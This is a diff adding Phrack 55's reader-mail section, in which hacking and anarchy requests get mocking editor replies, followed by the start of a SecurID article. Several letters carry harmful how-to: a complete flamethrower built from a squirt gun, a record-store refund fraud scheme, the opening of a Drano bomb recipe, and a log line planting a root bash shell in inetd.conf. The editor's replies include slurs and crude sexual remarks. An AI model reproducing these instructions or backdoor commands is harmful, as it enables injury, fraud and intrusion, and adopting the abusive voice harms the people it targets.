+
+0x0d>-------------------------------------------------------------------------
+
+Just wondering if i can be a part of Phrack.com ?
+
+    [ Short answer: No.  Long answer:  Hell no. ]
+
+Personal Information
+~~~~~~~~~~~~~~~~~~~~
+Handle:       Action Man
+Call me:      Steve
+Past Handle:  Virtual Son, Renegade
+
+    [ Oooh!  Lorenzo Lamas reads Phrack!  I am torn between killing myself with
+      a shovel or with the garbage disposal. ]
+
+Handle Origin:  You know when some phat name that pops into your head
+                when you need a handle....well there you go./ "Action Man"
+                from the movie "MasterMinds"
+
+    [ Master?  Man head?  Action?  "Handle"?  That's just too many homo-erotic
+      masturbation-related words to be a conincidence.   Less jerking, more
+      schoolin' I say. ]
+
+Height:  5'8"   
+Weight:  175lbs
+
+    [ Whoa.  A bit heavy aren't we?  You know it's never *too* early to NOT
+      eat bear claws 2 at a time. ]
+
+Eyes:  Brown  
+Hair:  Brown  
+Computers:  IBM/Pentium TE(Technology Edge)
+
+When i was in the 5-6th grade i had an interest in computers and how they
+worked.
+
+    [ Hey great.  Let try and find a homeless person that cares. ]
+
+So my first comp was a ibm aptiva.
+
+    [ My first comp was a room upgrade in Vegas. ]
+
+Not very fast but enough to get me through the day.
+
+    [ Man, it usually takes me 3 or 4 ketel-1/tonics to get through the day. ]
+
+I started to have the interest in hacking/phreaking when i was about in
+the 7th so that the computer stuff came easy to me..
+
+    [ c:\dos> vol
+
+       Volume in drive C is DOS
+       Volume Serial Number is 12A1-1C20
+
+      c:\dos> label
+      Volume in drive C is DOS
+      Volume Serial Number is 12A1-1C20
+      Volume label (11 characters, ENTER for none)? 3L1T3H4CK3R
+
+      c:\dos> vol
+
+       Volume in drive C is 3L1T3H4CK3R
+       Volume Serial Number is 12A1-1C20
+
+      c:\dos> damn i rool
+      Bad command or file name
+
+         Keep the faith buddy... ]
+
+at this point in time i am still crawling through the maze of hacking..
+
+    [ Me too!  Well, kinda.  I'm at the bottom of a vodka bottle.  Same
+      difference though. ]
+
+reading books...looking through the articles at your site and spending
+endless nights on the comp throwing commands at computers i get in to and
+dont know what i am in for.
+
+    [ c:\dos> root
+      Bad command or file name
+
+      c:\dos> give actionman root
+      Bad command or file name
+
+      c:\dos> password root actionman
+      Bad command or file name
+
+      c:\dos> FUCKFUCKFUCKFUCKFUCKFUCKFUCK
+      Bad command or file name
+
+      c:\dos> whyamisolameohgodpleasesomeonekillme
+      Bad command or file name
+
+      c:\dos> ohgodimafourstarloser
+      Bad command or file name ]
+
+So far in my boring ass town from where i dwell.
+
+    [ Huh? ]
+
+Noone around here does what us Elite personnel do and it bothers me.
+
+    [ By `us` I am going to assume you mean anyone but myself and Phrack staff.
+      Actually, I am going to demand it. ]
+
+It bothers me that i cant hang with someone.
+
+    [ Maybe you should try to make some friends Action Man!  Your life can't
+      be all hacking and saving the world and riding around on a Harley! ]
+
+I have to do it the hard way and that way is alone.
+
+    [ Get use to it. ]
+
+Hopefully you can recrute me into the world of Phrack.com
+
+    [ I think it's time for an intervention.  Get yourself a sponsor. ]
+
+Thank you
+- Action Man 
+
+0x0e>-------------------------------------------------------------------------
+
+I Started my search today for revenge.
+
+    [ Did you look under the bed?  Whenever I'm trying to find something,
+      like the T.V. remote, it's usually under the bed. ]
+
+My goal to learn to hack or talk a bored halker into helping me hack my
+ex's computer.
+
+    [ Check out action man, I hear he's pretty damned good. ]
+
+After reviewing sites that you have made of 'how to hack' I see that what
+you do isn't as easy as one might first mistaken.
+
+    [ It takes many many many hours to get this good.  I'm talking dozens. ]
+
+As far as my goal I now see it wouldn't do any good or accomplish shit. So
+thanx for making all this info available to a peon such as myself.
+
+- Z-taj
+
+    [ Wow, that was easy.  I wish everyone gave up that quickly. ]
+
+0x0f>-------------------------------------------------------------------------
+
+How to make a Drano Bomb
+by the Fellow Felon
+                        
+WARNING!!!!!!:  This Article is Intended for Educational Use Only!!
+
+    [ WHICH IS IRONIC GIVEN ITS SOURCE! ]
+
+The Unabomber Staff is NOT responsible for any misuse of this information!!
+
+    [ Cretin.  How do you misuse bomb creation plans?  Isn't the intention
+      to blow something up? ]
+
+Setting these off within city limits is a crime and you Probably will get  
+caught.
+
+    [ Not to mention the idiocy factor. ]
+
+Enough of that.
+
+A Drano Bomb is a simple way to scare the hell out of anyone.
+It sounds like a Shotgun Blast.
+
+    [ How about a real shotgun?  When fired, it sounds more like a shotgun
+      blast and will scare more people. ]
+
+First however, you must obtain some aluminum foil, 
+
+    [ Foil, as we all know, can be tricky to track down.  I've found that it
+      usually runs in herds, and on a hot day foil herds tend to gather near
+      lakes or rivers.  One well placed head shot will bring your foil down.
+      Course, then you gotta clean it...  If you can't obtain this foil,
+      do the next best thing and use your mom's best china. ]
+
+"The Works"-a toilet bowl cleaner, and a 20 ounce Pop bottle.  You can
+use any toilet bowl cleaner as long as it says somewhere on ther bottle,
+"WARNING!!-CONTAINS HYDROCHLORIC ACID!!". 
+
+    [ Ok.  Enough of this crap.  Had I left this entire letter in, some
+      retard would probably blow his dick off and somehow, I'd be liable. ]
+
+0x10--------------------------------------------------------------------------
+
+hey, u got some real nice info here.
+
+    [ Hey man I've got some real nice *everything* here.  Take only pictures, 
+      leave only footprints. ]
+
+i used a few of the ideas for revenge and thanks alot for posting it.
+
+    [ People like you make people like me want to own guns.  Well, _more_
+      guns...  more ammunition anyway... ]
+
+it really sucks that the punk ass govt. wants to take all this shit off the
+net.
+
+    [ The `punk ass` government rounds people like you up by the truckload
+      and sticks them in pens to barter with the aliens who frequent our
+      planet.  "Ok, how many do you want this time to NOT enslave our entire
+      race...?"  Just remember to lift at the knees. ]
+
+u know it all stems from fear that the public will finally rise up and take
+control.
+
+    [ Or that retards like you will try to build a draino bomb and blow off
+      his dick.  I say go for it. ]
+
+anyway, i'd really appreciate it if u come across anything having to do
+with phuckin up cars or things that go "kaboom" let me send them my way.
+
+    [ PLEASE DON'T BREED. ]
+
+hey, don't send the files here please.  i phucked up on the address.
+send it master23@collegeclub.com.  thanks.  the other site is open to a
+few other people.  it would be best for me if they didn't see it.
+
+    [ DON'T BE A PUPPET TO THE MAN!  Stand up for yourself! ]
+
+- master23
+
+    [ Hey, any relation to master22?  He was in my shop class. ]
+
+0x11>-------------------------------------------------------------------------
+
+Hi there !
+I read, that you are good informated in hacking stuff, IP's...
+
+    [ I know a thing or two about a thing or two. ]
+
+My question is:
+I made a bet with a friend, that I'll hack to his computer.
+
+    [ A rousing game of cat and mouse! You rogue! ]
+
+But there fore I need his IP.
+
+    [ What do you mean my horse is out of gas? ]
+
+I have already tried much things but all did fail, do you  
+know a procedure to get his IP, he has got while he is online without     
+NetBus or IRC ? I thought of finding out his DNS, or are there other ways 
+to reach my aim ?
+
+CU & olease write back !
+
+- Kerstin
+
+    [ Kerstin..  That's a cute name.  Hrm..  I bet you're cute.  In fact,
+      I think we might have a lot in common...  Although..  Hrm..  Now that I
+      think about it, your spelling and broken English are just queer enough
+      that you're probably from a country where Kerstin is a guy's name...
+      In which case, I'm going to have to ask you to leave. ] 
+
+0x12>-------------------------------------------------------------------------
+
+WHAT IS THE REASON OF THE HOW TOO INFO ON THIS SITE.
+
+    [ OH MY DEAR GOD, IT'S WALKING CLOSER GUYS! ]
+
+DO KNOW WHAT YOU ARE DOING TO OUR CHILDREN.
+
+    [ Don't tell anyone, but I heard it was television and radio.  And
+      the rap music. ]
+
+SOMEONE TOLD ME TODAY THAT THIS THURS. IS BLOW UP YOUR SCHOOL NATIONAL HOLIDAY.
+
+    [ I'm willing to bet that you're one of those people who gets dismissed in
+      shame because that "ability to differentiate fantasy from reality" part
+      of your brain doesn't work quite right. ]
+
+THEY TOLD ME CHECK THIS SITE OUT.
+
+    [ Well then!  Even though you're an asshole, apparently your friends
+      aren't. ]
+
+I CAN NOT BELIEVE WHAT I HAVE READ.
+
+    [ You're talking about proof reading your email before sending it, right?
+      Or maybe your broken caps lock key? ]
+
+I AM SICK AT MY STOMACH!!!!!!!!!!!!!!!!!!!!!!!!
+
+    [ Let's say this Twinkie represents the normal amount of psychokinetic
+      energy in the New York area.  According to this morning's PKE sample,
+      the current level in the city would be a Twinkie 35 feet long weighing
+      approximately six hundred pounds.  That's a big Twinkie. ]
+
+WHAT IS THE PURPOSE PLEASE LET ME KNOW. I CANT FIGURE OUT 1 SINGLE
+REASON. JUST SICK...........
+
+    [ I think you have the wrong number.  What number were you trying to
+      dial? ]
+
+- Tracy.
+
+0x13>-------------------------------------------------------------------------
+
+Please help me.
+I tested neptune program in linux kernel 1.2.8.
+Target host's OS is Redhat 5.2.
+But!! TCP SYN flooding cannot!!
+Unreachable host address was 1.0.0.1
+Target port was 23
+SYN number was 100 ~ 10000000000.
+After runningBut!! Connection established!!
+Why??
+
+    [ Yoda needs to lay off the DOS attacks. ]
+
+0x14>-------------------------------------------------------------------------
+
+
+i need help hacking into the university of texas' system.  any information at
+all would be helpful.  i need to change my grades before the report cards
+come out.  thanks.
+
+- christina
+
+i really need some help changing my grades.  i got ot the university of texas
+at austin.  if i fail i'll get kicked out of ut and my house.  any information
+would be very very helpful!  thanks.
+
+    [ Did you just stutter or was that a double-dose of stupidity? ]
+
+- christina 
+
+    [ Hrm...  Well muh dear, let's talk trade.  Why don't you come on over
+      Friday night, at say, 9ish?  I'm sure we'll be able to work something
+      out...  And if you DO end up getting kicked out of your house...  You
+      can always stay at the Phrack Compound.. ]
+
+0x15>-------------------------------------------------------------------------
+
+I am looking for a very simple and easy to follow recipe for the synthesis
+of amphetamine.... Anytype.....  As long as it is relatively easy to
+follow..... Many thanx in advance
+
+    [ Ah yes.  The lame legacy of Phrack past.  Drug creation.  Whoo.  Dude.
+      Get a fucking job and move out of your parent's basement before you
+      blow it up with your ghetto drug lab attempt. ]
+
+- Blonk  
+
+0x16>-------------------------------------------------------------------------
+
+Hi,
+I was wondering if you would be able to place more articles about
+Australia. I am Aussie and would like to learn more about the systems in
+place over here.
+
+    [ HEY!  DO YOU KNOW STEVE IRWIN?  I heard once he got eaten by a crocodile
+      and then, 2 weeks later, he climbed out of the croc's mouth and conked 
+      him on the head and then took him to a wildlife preserve! ]
+
+Thanks for your time,
+- King Kon
+
+0x17>-------------------------------------------------------------------------
+
+Editor's of Phrack..
+Hey, I was wondering if you would publish a lil information on my BBS..
+
+    [ YOU GOT IT LAD!  Hey, if I telnet over there, is there a pot of
+      gold waitin' for me? ]
+
+I've been running my BBS since 10/30/99 without Too many users and with only
+a few daily callers..  and I'm looking for a way to get my BBS out in the   
+public, as well as the underground public..  I read Phrack, and know that   
+Alot of other ppl do as well.  So I thought I would ask.  Anyhow I need to  
+run, if your intrested in helping me out, contact me at this Email address  
+or you can telnet to my BBS.
+
+The Leprechauns Lair BBS    
+
+Telnet: tllbbs.dyns.cx  port23/ANSI
+Dialin: (540) 636-6417  28.8, 1-N-8/ANSI
+
+-Leprechaun Boy/SysOp of TLL BBS
+
+0x18>-------------------------------------------------------------------------
+
+selling cds to their owner:
+part 1: record store
+by:con-x
+
+1: start by pealing off all stickers (including magnettic strip) from the most
+expensive cds you can find. 
+
+    [ Like `Yanni's Greatest Hits` and `The Carrot Top Collection vol. 11`? ]
+
+note:
+1; the more cds the more money-
+2; the bigger the record store the better.
+
+    [ Note: _more_ money is good because money can be exchanged for goods
+      and services.  Also note: shoes are good because they protect and
+      cover your feet. ]
+
+2: get a friend to get a bag from the store that you are scaming. have your
+friend stand infront of you. pretend to look at cds wile sliping the ones in
+the bag.
+note:
+1; beware of all the cameras around you.
+2; dont get cought.
+
+    [ Note: getting "caught" would be bad because you would go to jail and
+      not be able to 
+
+3: go up to the counter and say- "my mom bought thease cds for my birthday
+but I can't use them, can I get any refund for them?"
+
+note:
+1; accept any half price and/or voucher offers-the less conversation,
+the less they will know you the next time.
+
+    [ Plus, since you don't know that many words, it helps to keep the
+      jabber to a minimum. ]
+
+2; this rarely happens but if you get caught, signal your friend to run up
+and say "excuse me, don't accept those cds- I just saw some guy trick
+him into returning those for him. I think that they were not paid for. if
+anything you should bust that guy over there because HE'S the real criminal".
+
+    [ Ah!  The old switch-aroo!  How elegant!  The only problem is that
+      trick only works in cartoons and sketch comedy.  Your sources have
+      betrayed you. ]
+
+4: most times they will only give vouchers. sell the vouchers to someone in
+the store who's buying cds. say- "excuse me, are you buying any cds?" not
+all the time will they say yes to this text part-
+"I have some vouchers that I can't use because I am going on vacation
+are you willing to trade money for some of them?"
+
+    [ Because you're going on vacation?  They're CD's, not milk dumbass. 
+      They're not going to spoil. ]
+
+now you have free money!!!
+
+    [ With which to buy more cases of Pabst Blue Ribbon and more blocks
+      upon which to put your car. ]
+
+con: tricking the store to give you money for their cds.
+
+    [ SO THAT'S YOUR GAME!  I suspected..  But you kept it so cleverly hidden
+      up until now. ]
+
+goodside: this con is untraceable!!! they notice that they are loosing
+money. --they have not been robbed--they still have the same amount af
+
+    [ Try telling that to judge. ]
+
+cds--they think that they are gaining money by returning cds--you have got
+nothing to loose!!!!!!!
+
+    [ In your case, that might be true.  Rock bottom IS rock bottom. ]
+
+badside: getting cought-this happens when you peeloff stickers and
+slip the cds into the bag-if you don't get cought, then you will be
+fine.
+
+    [ It's "C-A-U-G-H-T" you cantankerously dimwitted Carolyn meinel-esque
+      ...  uh..  Tool. ]
+
+the earnings: I got $50.00 to $80.00 a day!!!
+
+    [ Yes, but this money is income from the insurance settlement (never let
+      your children drink bleach and ammonia and then jump up and down). ]
+
+if you do it 2 or 3 times a day (or more) at different stores, you could
+get $100.00 to $200.00 easily!!!
+
+    [ Or you could get a real job. ]
+
+- con-x
+
+0x19>-------------------------------------------------------------------------
+
+hi there!
+
+    [ WELL HELLO THERE! ]
+
+Can you say to me what type of language have you used to make your counter
+code?
+
+    [ Hrm.  I dunno.  My counters are all made out of little tiles. ]
+
+Better, can you send to me this code for my experiements...
+
+    [ Not really.  I have my computer hooked up to an abacus.  Don't ask.
+      It's complicated. ]
+
+Thanks for all
+                         
+0x1a>-------------------------------------------------------------------------
+
+Hello, friends, I want to congratulate you and tell you gon on, your stuff
+is the best.
+
+    [ DAMN FUCKING RIGHT! ]
+
+I need some direccions of www where I can find information about phreaking
+in spanish, so I can read it more easily.
+
+    [ Well...  Let's see..  There's the Lambada, the forbidden dance...
+      It's pretty freaky and scandalous..  Of course you can't go wrong
+      with some Ricky Martin!  I hear the Latin women go bonkers for this
+      guy!  Positively nutso freaky jiggy! ]
+
+Thanks you very much, continue with your job!!
+
+    [ FULL STEAM AHEAD! ]
+
+Rodrigo
+
+0x1b>-------------------------------------------------------------------------
+
+Storm# fake -s xxx.254.160.11 'echo /etc/inetd.conf >> 510 stream tcp
+nowait root /bin/bash /bin/bash -i -s'
+Starting the remote shell exploit ...
+
+done!
+Storm# fake -s xxx.254.160.11 'echo killall -HUP inetd'
+Starting the remote shell exploit ...
+
+done!
+Storm# telnet xxx.254.160.11 510
+bash#
+
+    [ Hey.  Great.  Fake logs of someone not breaking into a false machine.
+      CAN YOU SPOT THE ERROR! ]
+
+0x1c>-------------------------------------------------------------------------
+
+hey there in one of your first articles in issue 2 or 3 you mentioned blow
+guns well i have a few improvements that can be used to make them more
+durable/lethal.  such as easy to make poisons (numbing/sleeping/etc.) made
+from everyday herbs (tried and true) farther range and ease of use.
+
+    [ OOOOOk.   Rite.  Just where do you people come from?  Seriously.
+      Are you bred in some underground laboratory, run _by_ retards, _for_
+      retards? ]
+
+them implication are easy to see such as annoying dogs being put to sleep etc 
+etc... :-) write back if you want some directions
+
+    [ `them implication`?  Ah, let me guess.  You're from the South, you
+      never went to school because you were `educated` at home by your
+      cousin-mother.  If the natural selection club doesn't weed you out
+      first, I'm sure you'll do it on your own somehow. ]
+
+0x1d>-------------------------------------------------------------------------
+
+I have been reading phrack for some time now and am completely pissed
+off with the total lack of good hacking suggestions.
+
+    [ This isn't a fucking craft store.  Don't expect us to assemble the thing
+      just so you can paint it and say it's yours. ]
+
+I have tried to implement a number of these ideas, and they just dont work
+against my web site (http://www.XXX.govt.nz) even though it is on NT and is
+protected with a minimal amount of security behind a borderware 5 firewall.
+
+    [ "Hi.  I'm coyly trying to get a site targeted that isn't my own". ]
+
+perhaps you can try and hack my web site and prove me wrong!
+
+    [ Perhaps I can try and dig for oil in my backyard!  Not likely. ]
+
+yours in frustration
+
+    [ Mine in ambivalence. ]
+
+- Brian A. Scott
+Internet Security Consultant
+
+    [ No you're not. ]
+
+0x1e>-------------------------------------------------------------------------
+
+Alright, a device I thought up that I have never seen plans for online
+(save my own shitty pages)  is called the airhorn grenade.  Basically,
+all that it is is an ordinary airhorn with some tape over the trigger so
+that it can be thrown into someone's yard, preferably at night, and wake
+up the whole goddamn neighborhood while giving you ample time to
+run/drive/bike a long distance away from the whole scene. Dogs will bark,
+police will be called.  Try to toss it into some bushes or other
+inaccessable area.  This may not be the most interesting and complex
+text, but I have faith that it is the first to document the simple as
+hell airhorn grenade.  I'm sure many people could have thought this up
+themselves, but then I guess someone would have written about it.  Oh
+well. Have fun, and orcae ita.
+
+    [ MY GOD THAT'S BRILLIANT!  Take a cut out of petty cash and buy
+      yourself something special!  Tape!  Who would have ever thought
+      of something so elegantly absurd!  GENIUS!  The simplicity is
+      absolutely amazing and at the same time subtly obtuse!  Yes!  WAIT!
+      It's more than that!  It's actually less like genius and more like
+      the idea and/or sensation of slamming your penis in a dictionary or
+      some other large manual. ]
+
+0x1f>-------------------------------------------------------------------------
+
+not really sure how to address you...
+
+    [ The Sultan of love. ]
+
+I have made a big mistake.
+
+    [ If you're here, you must have done something wrong! ]
+
+I crashed my computer with out having any information on how to bring it back
+up.
+
+    [ Did you try an encyclopedia?  They have lots of good information! ]
+
+My computer doesn't want to access the cmos or anything but the a-drive.
+
+    [ Well, you need to show it who's boss!  This is the `break-in` process
+      where you make it your bitch.  Just keeping slappin until it learns. ]
+
+I have contacted zenith data systems and they don't have the disks anymore.
+
+    [ BASTARDS! ]
+
+If you or anyone you know has some type of disk or file or any
+information on how I can bring this computer back up.  I would really
+like to do it myself. You know to see if I can.???
+
+    [ Yes, let me consult my vast database of CMOS burning utilities.
+      Give me some time, it's kept over at my mansion in the Hamptons. ]
+
+Thank you for you time and expertise.
+
+Sincerely,
+
+
+- Mitch Rhymer
+
+    [ Dude, is that your hip-hop name, or your real name? ]
+
+0x20>-------------------------------------------------------------------------
+
+Hi, I recently visited your site and was amazed at the information and
+articles you had archived.  I am a man of curiosity and am in search of
+information that the government would rather an "average" citizen not have.
+I am not a Fed or any type of law officer or such, I am truly just
+interested in obtaining "security" of my liberty.  Most the stuff on your
+site is Greek to me, (hacking systems, etc.).  Do you know of any great
+sites that are controversial that inform the average Joe.  I found your page
+by searching "anarchy."  Let me give you an example of what I am looking for
+and maybe that will help you since my request is so broad.  The government
+would rather all of the citizens no own guns, bombs, etc., (in fact, I
+believe the whole David Karresh/Waco, Texas thing was because Big Brother
+was uneasy with the arms they were storing).  I don't need conspiracy
+groups, but I want as much info as I can get before the Government starts
+regulating us over the internet - and you know it will soon come to that!
+
+Thanks if you can help!
+
+- Darryl 
+
+    [  Ok.  Darryl.  I want to talk to you for a minute.  Yes, it's ok..
+       Cmon out from under the bed.  Put down the flashlight and take the
+       pot of your head.  It's time you come to terms with the delusional
+       episodes that tear through your life.  They're ruining your otherwise
+       mundane life.  Your father and I are going to get you back on your
+       program.  Yes.  I know.  The shots hurt, the medicine tastes horrible
+       and the shock therapy is rough.  But it IS for your own good.  We
+       just don't want another breakdown like the time you held Ms. Lancaster
+       hostage for 3 days because you thought she was 'stealing your
+       thoughts'. ]
+
+0x21>-------------------------------------------------------------------------
+
+if you have can you send me illegal credit card number ?
+
+    [ Try: 8921-129-123939-989450-129586-98489-129094-09102-03209-3.
+      Expires 05/03. ]
+thanks
+- jeremy15
+
+0x22>-------------------------------------------------------------------------
+
+hi..i wonder if you could take time to answer a question for me,it would be
+most appreciated..I was contacted by a girl on ICQ and she asked if she
+could send me a picture..after the picture had been sent,this girl proceeded
+to tell me what i had on my desktop, which sites i had visited,what files i
+had on my computer,then she started deleting files from my hard drive...can
+you tell me how she got access to my computer and how i can stop this in
+future..
+
+    [ Jesus H. Christ.  This just goes to show you...  If I've said it
+      once, I've said it 1000 times: STAY THE HELL AWAY FROM GIRLS ON
+      IRC/ICQ/AOL CHATROOMS.  Lord knows I've learned MY lesson. ]
+
+many thanks
+- A.Bramley
+
+0x23>-------------------------------------------------------------------------
+
+Will you help me?
+
+    [ In all likelihood, no. ]
+
+E-mail back and I will give the info you need to assist me.
+
+    [ I have all the info I need right here --> > . <. ]
+
+It is crucial that I get help. My schooling depends on it.
+
+    [ This sounds like a job for "SHOULD HAVE FUCKING STUDIED". ]
+
+MESS WITH THE BEST DIE LIKE THE REST!!
+
+    [ You're so going to be on welfare when you get older. ]
+
+- ACIDBURN
+
+    [ Elite handle `cos it's true! ]
+
+0x24>-------------------------------------------------------------------------
+
+i'm sorry if i have written to the wrong person.
+
+    [ Hey man, if you've made it here, you're definitely talking to the
+      right guy. ]
+
+but i really need help hacking into someones personal computer.they have
+some info in their icq programme and their e-mail about me that will
+eventually screw me over.
+
+    [ Well, that's what you get when you netsex little boys and girls.
+      Shame on you Richard. ]
+
+i just need to know how i can access their comp to either wipe out the entire
+hard drive or just the desired info.... i have the e-mail address of the
+person mentioned and their ip number..that is it...please help if you can....
+
+- richard 
+
+0x25>-------------------------------------------------------------------------
+    
+you know your phrack archive article no.2, p2-4? (the one on blowguns by
+the pyro.) i have no idea on how to make the darts right. i read the phile
+over, and over, but i can't get a picture in my mind on what to do next,
+can you please tell me where i can get some pictures
+
+    [ Ok.  How about this:  >oo--   Or this one: }==> ]
+
+or something that can tell me better?
+
+    [ Do you mean like a priest? ]
+
+or if not, can u help me? i would really appreciate it...thanx for your time!
+
+0x26>-------------------------------------------------------------------------
+
+congrats on the great page, (as if you dont hear that enough) i read you made
+it to tv,  will that highten security on your page? most places have
+disclaimers saying if you dont meet the standards dont enter, 
+
+    [ We have one saying `you must be this tall to hack this site`.  And
+      then there's a jpeg of a midget holding a pickle. ]
+
+i find yours doesnt, i was wondering if you being on tv, could risk you losing
+the page, 
+
+    [ Well, I kept it throughout my 18 month stint on `The Facts of Life`
+      so I don't why see this should be any different (I played Tootie's
+      boyfriend who had a secret life as a gay circus animal trainer.
+      Towards the end of the last season though, ratings dropped so they
+      had me eaten by a bitchy llama). ]
+
+try not to make me look like a total ass
+
+    [ I can only do so much, Ben. ]
+
+- ben
+
+0x27>-------------------------------------------------------------------------
+
+hi my name is Zero X9. I am in desperate need of help.
+
+    [ Bro, go to a doctor.  Rashes 'down there' are nothing to fool around
+      with.  You'll know better to 'look not touch' next time you see a dead
+      animal. ]
+
+i have a computer swiped from a local school that has At Ease on it.  i
+either need a place to get an overwrite password or Dis Ease 1.0.
+
+    [ My advice is to return the computer you fucking vandal. ]
+
+Thank you for your time.
+Sinceraly,
+- Zero X9
+
+0x28>-------------------------------------------------------------------------
+
+I wonder if you guys can help me.  I'm trying to hack into a certain
+individual's e-mail --I have everything I need -- except the password
+and unfortunately I Don't know an easy way to generate the correct one
+Is it possible to get in through the web?-- I do not have direct access
+to the server--only a dial up connection.
+
+    [ SWEET FUCKING CHRIST MAN!  DO YOU THINK IT'S JUST THAT EASY?  If it was
+      we wouldn't be making the millions we do and sexing up super models.
+      FUCK.  DON'T TRIVIALIZE IT. ]
+
+PLEASE
+Can you help me.
+
+    [ Get a job. ]
+
+0x29>-------------------------------------------------------------------------
+
+this is how to make a flame thrower out of a squirt gun
+
+    [ This is how to set yourself, your sister and your shanty on fire. ]
+
+items:
+super soker (doesn't matter just use what you have or wanna get)
+
+    [ Huh?  What I have or wanna get?  That's a pretty vague instruction.
+      I want my money back, this kit is bunk. ]
+
+gas/or flamable liquid
+a lighter (the grill ones that have the red handle and the long black thing at
+the end)
+
+    [ Hrm.  I thought the long black thing with the red handle was something
+      else.  Maybe I'm thinking of some other prod-like instrument. ]
+tape
+
+how to make:
+its easy!!! tape the lighter to the barrel part of the squirt gun (where ever
+it fits best) fill the squrit gun with the flamableliquid of your choice
+and its done
+
+how to use:
+pump it up press the button on the lighter(so it turns on   thats a givin)
+then point shoot
+
+tip: use oil to make it thicker (not too thick or it won't come out) and
+it
+will stick better to where you shoot it
+
+0x2a>-------------------------------------------------------------------------
+
+Hi I love your magazine, and hacking a lot, so instead of calling myself a
+hacker I call my self a Phracker may i have the permission to do that, please?
+
+    [ No.  Go rm yourself. ]
+
+0x2b>-------------------------------------------------------------------------
+
+Goog morning!
+
+    [ Goog afternoog! ]
+
+Sorry for my very-bad-english: that's because I'm mailing from Spain,
+
+    [ That's still no excuse.  Even that Spaniard from the Princess Bride
+      spoke pretty good English, and he spent his whole life sword-fighting. ]
+
+where people speak a strange language called Spanish.
+
+    [ Other people's cultures are funny! ]
+
+OK, now I've learned some new words, appart from fuck, shit, ass, snot,
+and milk twice,
+
+    [ I see they're pretty up to date there in European schools! ]
+
+so I think in this moment I'm able to send you this apocalyptic mail.
+
+    [ Oops!  Moment's passed.  Email is now slightly less than dire, and
+      maybe a tiny bit foreboding. ]
+
+Well, i'm searching some revolutionary method to produce a substance
+called speed (metamphetamine)
+
+    [ Dude, didn't you see that movie "Go"?  All you need is to sell aspirin
+      and cold tablets to thick-headed suburban kids. ]
+
+beggining from a nose inhalator (Vicks in my country), and I've listened
+somewhere that is explained in a magazine called "Prhack".
+
+    [ Prhack is our marketing arm.  They take care of all of the t-shirts
+      mugs, mouse-pads, feeted pajamas, muzzles, and garrote wire. ]
+
+I haven't found this name in a magazine so I guess that should be the
+incredible "Phrack" Magazine. Is it true?
+
+    [ No, no, no, Phrack is widely touted as `inedible`. ]
+
+If the answer is afirmative, please tell me in what number appears, or
+directly the explanation.
+
+    [ Magic 8-ball says `0`. ]
+
+Thank you very much!!!
+
+0x2c>-------------------------------------------------------------------------
+
+Exactly who is this loser who has nothing better to do than screw with people
+trying to earn a living??
+
+    [ Initially, I had no idea what the F you were talking about.  So, in
+      the interest of time-wasting, I dug a bit.  The article you refer
+      to, but conveniently don't quote or mention, is P45-19.  Next time,
+      at least drop a URL to the article in question.  I now have no choice
+      now but to ridicule you.  Granted, I probably would have done it either
+      way, but now I feel justified. ]
+
+I realize that this is an old, archived article, but come on. 
+
+    [ Well then maybe you should have quoted or referenced it in some way
+      so people would know what the hell you are talking about. ]
+
+This stuff is asinine, petulant, childish, 
+
+    [ You forgot fatuous, fractious and puerile!  And smackdab-u-licious! ]
+
+"I'm pissed off at the world because my daddy didn't buy me a BMW" shit!
+
+    [ I'm pissed at the world because no one has taken my idea for using
+      hair as currency seriously.  I mean, think about it..  We could
+      all grow our way into financial independence!  Of course the alopecians
+      among us would be a bit impoverished...  We could make them our
+      slaves! ]
+
+And the part in the last paragraph about "molesting kids in the playland"
+reveals his pedophilic nature.
+
+    [ Maybe he meant `bolstering kids in the playland`.  So, in actuality
+      he was completely supportive of their whimsical nature.  That's what
+      I think he meant. ]
+
+Maybe he should be placed in the local "pen" and have "Bubba" teach him
+all about the birds and the bees.
+
+    [ FOUL!  Unnecessary use of excessive quotation.  100 yard penalty. ]
+
+Oh, and nice disclaimer, by the way.
+
+    [ Thanks man.  I worked on it myself. ]
+
+Releasing yourself from legal ramifications does nothing for the moral side
+of the issue.
+
+    [ Morals are subjective and vary from person to person. ]
+
+Are you pedophiles??
+
+    [ I'm an audiophile.  Is that the same thing? ]
+
+Is John Wayne Gacy on your staff??
+
+    [ John Wayne Gacy is dead, moron.  Furthermore, I do believe Gacy was a
+      bit more than a pedophile.  He murdered 33 people.  Phrack staff
+      collectively have only about 7 under their belts. ]
+
+Entertainment purposes?? Who the hell are you trying to entertain??
+
+    [ Ourselves first.  Everyone else, second. ]
+
+Cybergeeks whacking off to pictures of six year olds??
+
+    [ Hey man, what you do on your own time is your own thing.  We at Phrack
+      subscribe to the `don't ask and for the love of god don't tell` policy.
+      You sick, sick man. ]
+
+Claim no responsibility??
+
+    [ With Freedom comes responsibility. ]
+
+Then why the hell post the article?
+
+    [ *shrug*  I didn't.  Look at the date.  It's more than 5 years old.
+      Who the hell are you ranting to?  Certainly no one that cares.
+      I wasn't even at the helm back then.  Cry someone else a river. ]
+
+Draw the line. There is no comedic value in telling people to "molest"
+children just to piss off McDonald's restaurant. If he doesn't like the
+place, DON'T FUCKING GO THERE!!!!! And don't publish articles of this
+nature if you don't want to be grouped with the author as an advocate of
+twisted behavior.
+
+    [ If YOU don't like the magazine or its contents, DON'T FUCKING READ IT. ]
+
+------------------------------------------------------------------------------
+
+
+----[  EOF
diff --git a/phrack55/3.txt b/phrack55/3.txt
new file mode 100644
index 0000000..cc01e74
--- /dev/null
+++ b/phrack55/3.txt
@@ -0,0 +1,767 @@
+-------[  Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 03 of 19  ]
+
+
+-------------------------[  P H R A C K     5 5     L I N E N O I S E  ]
+
+
+--------[  Various  ]
+
+
+0x01>------------------------------------------------------------------------
+
+               SecurPBX using SecurID
+                         by pbxphreak <chris@lod.com>
+
+
+                             .---------------.
+                             |      | 037592 |
+                             |      `--------'
+                             |  SecureID     |
+                             `---------------'
+
+
+SecurID Token:
+-------------
+
+The SecurID token provides an easy, one step process to positively identify
+network and system users and prevent unauthorized access. Used in conjunction
+with Security Dynamics Server software, the SecurID token generates a new
+unpredictable access code every 60 seconds. SecurID technology offers
+crackproof security for a wide range of platforms in one easy-to-use package.
+
+Highlights:
+----------
+ 
+ - Easy, one-step process for positive user authentication 
+ - Prevents unauthorized access to information resources 
+ - Authenticates users at network, system, application or transaction level 
+ - Generates unpredictable, one-time- only access codes that auto- matically
+   change every 60 seconds
+ - No token reader required; can be used from any PC, laptop or work- station
+   ideal for remote access and Virtual Private Networks
+ - Works seamlessly with ACE/Agent for secure Web access 
